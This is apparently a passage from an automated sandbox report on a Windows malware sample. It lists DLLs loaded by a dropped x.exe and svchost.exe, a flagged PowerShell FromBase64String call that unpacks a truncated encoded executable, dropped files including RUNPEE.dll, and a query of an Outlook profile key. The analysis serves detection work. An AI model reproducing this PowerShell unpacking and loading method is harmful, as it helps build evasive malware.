                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1110223011.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

                      Data Obfuscation

                      barindex
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAF
                      Source: x.exe.0.drStatic PE information: 0xDD796550 [Tue Sep 30 00:35:28 2087 UTC]
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_05012B2B push eax; iretd 0_2_05012B39
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_07BE27B4 push esp; ret 4_2_07BE27B7
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_07BE2C97 push esi; iretd 4_2_07BE2CEC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D59D2A push esp; ret 4_2_00D59D2B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655C7F2 push eax; ret 5_2_0655C7F9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06552E60 push es; ret 5_2_06552E70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655AD70 push es; ret 5_2_0655AD80
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_070606C0 push es; ret 5_2_070606D0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0706CC02 push cs; retf 5_2_0706CC09
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
